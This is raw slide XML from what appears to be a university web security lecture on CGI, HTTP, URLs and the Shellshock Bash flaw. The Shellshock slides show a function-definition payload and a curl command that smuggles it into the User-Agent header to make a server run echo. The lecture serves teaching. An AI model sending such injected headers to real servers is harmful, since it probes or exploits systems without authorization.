              <a:latin typeface="Helvetica" pitchFamily="-111" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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CGI Input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772400" cy="472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/>
              <a:t>PATH_INFO environment variable holds any path that appears in the HTTP request after the script name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QUERY_STRING holds key=value pairs that appear after ? (question mark)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Most HTTP headers passed as environment variables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r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>In case of PUT or POST, user-submitted data provided to script via standard input</a:t>
            </a:r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endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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CGI Output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Anything the script writes to standard output (e.g., HTML content) is sent to the browser.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 Script (Wikipedia)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09600" y="2133600"/>
            <a:ext cx="7772400" cy="2514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000" i="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>#!/usr/bin/perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
            </a:endParaRP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print "Content-type: text/plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\r\n\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>";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for my $var ( sort keys %ENV ) {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 printf "%s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>\"\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>", $var, $ENV{$var}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Lucida Console" pitchFamily="-111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4533900"/>
            <a:ext cx="808037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Put in file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/usr/local/apache/htdocs/cgi-bin/printenv.pl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0550" y="1524000"/>
            <a:ext cx="751046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Bash script that evokes PERL to print out environment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6750" y="5229225"/>
            <a:ext cx="7615238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Accessed via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/cgi-bin/printenv.pl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Windows Web server running cygwin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382000" cy="44196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DOCUMENT_ROOT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"C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs“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GATEWAY_INTERFACE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"CGI/1.1“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HOME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"/home/SYSTEM" HTTP_ACCEPT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"text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>html,application/xhtml+xml,application/xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.9,*/*;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.8“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HTTP_ACCEPT_CHARSET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"ISO-8859-1,utf-8;q=0.7,*;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.7" HTTP_ACCEPT_ENCODING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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>, deflate“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HTTP_ACCEPT_LANGUAGE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"en-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>us,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=0.5“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HTTP_CONNECTION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"keep-alive“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HTTP_HOST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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>HTTP_USER_AGENT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"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0" PATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>"/home/SYSTEM/bin:/bin:/cygdrive/c/progra~2/php:/cygdrive/c/windows/system32:...“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1"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PATH_INFO="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a: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/bar“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>QUERY_STRING="var1=value1&amp;var2=with%20percent%20encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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228600" y="1535113"/>
            <a:ext cx="88312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latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>example.com/cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>printenv.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>/foo/bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>var1=value1&amp;var2=with%20percent%20encoding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historical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The web is an example of “bolt-on security” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Originally, the web was invented to allow physicists to share their research papers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only textual web pages + links to other pages; no security model to speak of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then we added embedded images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crucial decision: a page can embed images loaded  from another web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, dynamic HTML, AJAX, CSS, frames, audio, video, ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Today, a web site is a distributed application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Shellshock Vulnerability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/>
              <a:t>Function definitions are passed as environment variables that begin with ()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r>
              <a:rPr lang="en-US"/>
              <a:t>Error in environment variable parser: executes “garbage” after function definition.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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/>
              <a:t>Cygwin Bash Shell Shows Vulnerability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24000"/>
            <a:ext cx="7974013" cy="439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514725" y="5938838"/>
            <a:ext cx="31242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Exact syntax matters!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Alternatively</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536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18" b="118"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr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Crux of the Problem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Any environment variable can contain  a function definition that the Bash parser will execute before it can process any other commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Environment variables can be inherited from other parties, who can thus inject code that Bash will execute.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Web Server Exploit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5257800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buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Send Web Server an HTTP request for a script with an HTTP header such as HTTP_USER_AGENT set to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 eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>'() { :;}; echo vulnerable'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 eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>When the Bash shell runs the script it will evaluate the environment variable HTTP_USER_AGENT and run the echo command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/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curl -H "User-Agent: () { :; }; echo vulnerable" http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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HTML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175994"/>
            <a:ext cx="8229600" cy="5349324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Hypertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> language (HTML) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Describes the content and formatting of Web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Rendered within browser window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HTML features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Static document description language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Supports linking to other pages and embedding images by reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>User input sent to server via forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HTML extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Additional media content (e.g., PDF, video) supported through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>plugins</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedding programs in supported languages (e.g., JavaScript, Java)  provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content that interacts with the user, modifies the browser user interface, and can access the client computer environment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protocol</a:t>
            </a:r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HTTP is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>widely used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unencrypted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411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68902" y="1641946"/>
            <a:ext cx="2053828" cy="250031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35781" y="3687961"/>
            <a:ext cx="4705945" cy="2982516"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4216" cy="2672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17412" name="Picture 4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" y="96"/>
              <a:ext cx="3960" cy="2320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17413" name="Picture 5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0"/>
              <a:ext cx="4216" cy="267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pic>
        <p:nvPicPr>
          <p:cNvPr id="17415" name="Picture 7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40934" y="4315272"/>
            <a:ext cx="2678906" cy="19913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URLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20481" name="Rectangle 1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 smtClean="0"/>
              <a:t>Global identifiers of network-retrievable documents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Tahoma" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.unc.edu:81/class?name=cs535#homework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What is the difference between URL and URI?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Are URLs case-sensitive?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="955477" y="3716983"/>
            <a:ext cx="80367" cy="603870"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000080"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="647402" y="4359920"/>
            <a:ext cx="1719926" cy="2477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400" dirty="0">
                <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r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4292034" y="3686844"/>
            <a:ext cx="198686" cy="841623"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000080"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3836620" y="4607718"/>
            <a:ext cx="1719926" cy="2477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400" dirty="0">
                <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20489" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5674816" y="3686844"/>
            <a:ext cx="428625" cy="1082725"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000080"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg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0" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5674816" y="4769569"/>
            <a:ext cx="1719926" cy="2477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400" dirty="0">
                <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7542238" y="3737074"/>
            <a:ext cx="455414" cy="392906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000080"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg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92" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7350249" y="4129980"/>
            <a:ext cx="2444994" cy="247798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2400" dirty="0">
                <a:ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>Fragment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Protocol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95430" y="3071812"/>
            <a:ext cx="601638" cy="92868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2758" y="3259336"/>
            <a:ext cx="741164" cy="741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1508" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="642938" y="3214687"/>
            <a:ext cx="1285875" cy="830461"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1612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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7099102" y="3214687"/>
            <a:ext cx="1285875" cy="830461"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1612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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21510" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3214687" y="3375422"/>
            <a:ext cx="263425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 flipH="1">
            <a:off x="3196828" y="3821906"/>
            <a:ext cx="2634258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2" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3548435" y="2986891"/>
            <a:ext cx="1301926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blurRad="25400" dist="12700" algn="ctr" rotWithShape="0">
              <a:srgbClr val="FEFFFE">
                <a:alpha val="45000"/>
              </a:srgb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eorgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21513" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3702472" y="3495883"/>
            <a:ext cx="1058245" cy="27699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  <a:effectLst>
            <a:outerShdw blurRad="25400" dist="12700" algn="ctr" rotWithShape="0">
              <a:srgbClr val="FEFFFE">
                <a:alpha val="45000"/>
              </a:srgb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ea typeface="Georgia" pitchFamily="-84" charset="0"/>
                <a:cs typeface="Georgia" pitchFamily="-84" charset="0"/>
              </a:rPr>
              <a:t>HTTP Reply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732484" y="1910953"/>
            <a:ext cx="3268266" cy="1023566"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2928" cy="917"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21514" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10751189">
              <a:off x="687" y="112"/>
              <a:ext cx="800" cy="800"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst>
                <a:gd name="adj" fmla="val 5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blurRad="50800"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5" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2928" cy="744"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16125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blurRad="50800"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9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GET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="19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 /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1900" dirty="0" err="1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index.html</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="19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 HTTP/1.1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9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Host:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="19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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1900" u="sng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  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>www.example.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1900" u="sng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143000" y="3982641"/>
            <a:ext cx="4196953" cy="2062758"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3760" cy="1847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21517" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2424" y="0"/>
              <a:ext cx="800" cy="694"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000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blurRad="50800"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8" name="AutoShape 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="159"/>
              <a:ext cx="3760" cy="1688"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
